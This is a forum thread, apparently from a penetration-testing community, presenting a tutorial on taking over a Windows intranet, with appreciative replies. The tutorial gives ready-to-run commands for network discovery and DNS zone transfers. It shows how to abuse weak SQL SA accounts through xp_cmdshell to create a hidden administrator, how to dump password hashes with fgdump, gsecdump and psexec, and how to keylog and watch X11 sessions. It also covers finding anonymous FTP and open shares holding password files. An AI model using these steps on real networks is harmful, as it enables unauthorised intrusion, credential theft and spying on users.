Tutorial : Intranet Exploitation

[williamc]

This tutorial will demonstrate how to gain Domain Administrator on a typical Windows intranet through common security oversights. Most of these tools are Windows based, but may run in Wine. Please post if you can verify this, or if you know a Linux equivalent tool.

Discovery

Obviously start with the network you've been DHCP'd.

NET VIEW command

Displays a list of computers in a specified workgroup or the shared resources available on a specified computer.

[\\computername [/CACHE] | /DOMAIN[:domainname]]

Code:

NET VIEW /NETWORK:NW [\\computername]

Domain Zone Transfers

Starting with the DNS servers you DHCP'd with, try to zone transfers. If successful, extrapolate Class C (/24) networks from the individual IP addresses.

Code:

dig @ns1.example.com example.com axfr

Nmap scanning

Perform a ping sweep of the network range.

Code:

nmap -sP -v xx.xx.xx.xx/24 > ping_results.txt

Clean up the ping sweep.

Code:

cat ping_results.txt | grep -i 'up' | cut --delimiter=" " -f 2 > ping_results_final.txt

Generate IP list from the know net ranges

Code:

gping xx.xx.0.255 >> iplist.txt gping xx.xx.0.255 >> iplist.txt

gping may be found here:
http://forums.remote-exploit.org/showthread.php?t=11988

Exploitation

SQL Discovery and Exploitation

A common entry point to a network is through unsecure SQL servers. SQLPing 3.0 performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. It also adds brute-force password capabilities and the ability to brute-force multiple instances.

It can be found here:

http://www.sqlsecurity.com/Tools/Fre...5/Default.aspx

Once you have found a weak SA account, use the command-line OSQL tool found bundled with MSDE. This is the syntax to create an account and promote it to a local administrator:
osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net user pwnd pwndABC123 /add'"
osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net localgroup administrators pwnd /add'"

With newer releases of SQL, you may find that the xp command shell has been disabled. Thoughtfully, Microsoft allows you to re-enable this feature!
osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'show advanced options', 1"
osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'xp_cmdshell', 1"

As a local administrator, you can now dump the HASHES for the local workstation. Use FGDump, found here:

http://swamp.foofus.net/fizzgig/fgdump/downloads.htm

Syntax:
fgdump -h %hostname% -u pwnd -p pwndABC123

If FGDump doesn't work, try GSECDump, found here:

http://www.truesec.com/PublicStore/c...ookieSupport=1

GSECDump should be used with psexec, found here:
http://technet.microsoft.com/en-us/s.../bb897553.aspx

Syntax:
psexec \\%hostname% -u pwnd -p pwndABC123 -s -f -c gsecdump.exe -s


X11 exploitation

If your nmap scans reveal port 6000-6005 being open, chances are you may be dealing with the X11 protocol (X Windows). X11 is plain-text and can be keylogged and remotely viewed. You will need the NSAT (Network Security Analysis Tool) which can be found here:

http://forums.remote-exploit.org/showthread.php?t=12312

You may find that the tool does not complete a make. Download my fixed version towards the bottom of the post.

Filter your nmap results to only show ports 6000-6005 and copy the results into a text file. NSAT will scan the hosts in this text file. Syntax:

nsat -C nsat_X.conf -n -f iplist.txt

The results should show something similar to this:

[port] 10.1.1.1 - X Windows
[port] 10.1.1.2 - dumpable/sniffable

Target the IP's that are "dumpable/sniffable" with XSpy, found here:

http://www.acm.vt.edu/~jmaxwell/programs/xspy/xspy.html

Syntax:

./xspy 10.1.1.2:0

You should now be keylogging this session. If you want to view the actual desktop of the user, use xwatchwin, found here:

ftp://ftp.x.org/contrib/utilities/

Syntax:

./xwatchwin 10.1.1.2:0

FTP exploitation

Utilizing NSAT, filter your nmap results for port 21. Take this IP list and run it through NSAT.
Syntax:
nsat -C nsat_FTP.conf -n -f iplist.txt

The results should show something similar to this:

10.1.1.1 - anonymous login
10.1.1.2 - anonymous login


Share Enumeration

A common security flaw occurs when users define file shares with lax security, allowing unauthorized users to see sensitive files. ShareEnum looks for these open shares on the network. You can find it here:

http://www.microsoft.com/technet/sys...shareenum.mspx

NetworkSleuth is a network file searching utility, that allows you to quickly locate files across a network. You can search for specific file names or for specific file types (e.g. files named/containing password). Get it here:

http://www.nsauditor.com/network_sleuth.html

I hope this helps some of you with your pen-testing endeavors. Please add to this tutorial with your own methodologies.

William

[purehate]

Thanks for the tutorial williamc. Officially though I have to move it to general IT because it is not based on backtrack. Nothing personal I'm just following the rules.

[s1lang]

Thank you for this mate

[lovena.2008]

Thanks for the tutorial

[imported_relik]

Ran across this, nice job thanks.

[williamc]

Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.

[ShadowKill]

Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.

Very nice work, brother. It's glad to see that knowledge isn't just being hoarded for personal gain, but is being shared for all the right reasons. Neophytes take heed: this is the kind of example you, and even those of us more versed in the security realm, should all follow....

I look forward to any and everything else you have to offer.

[Talkie Toaster]

Dude...

Thanks for sharing, well written tuts like this have me just itching to try out some new tools.

Time to break my home network,again...

TT

[bofh28]

Nice work williamc. SQLPing looks interesting.

I added a section on gsecdump to the password cracking guide.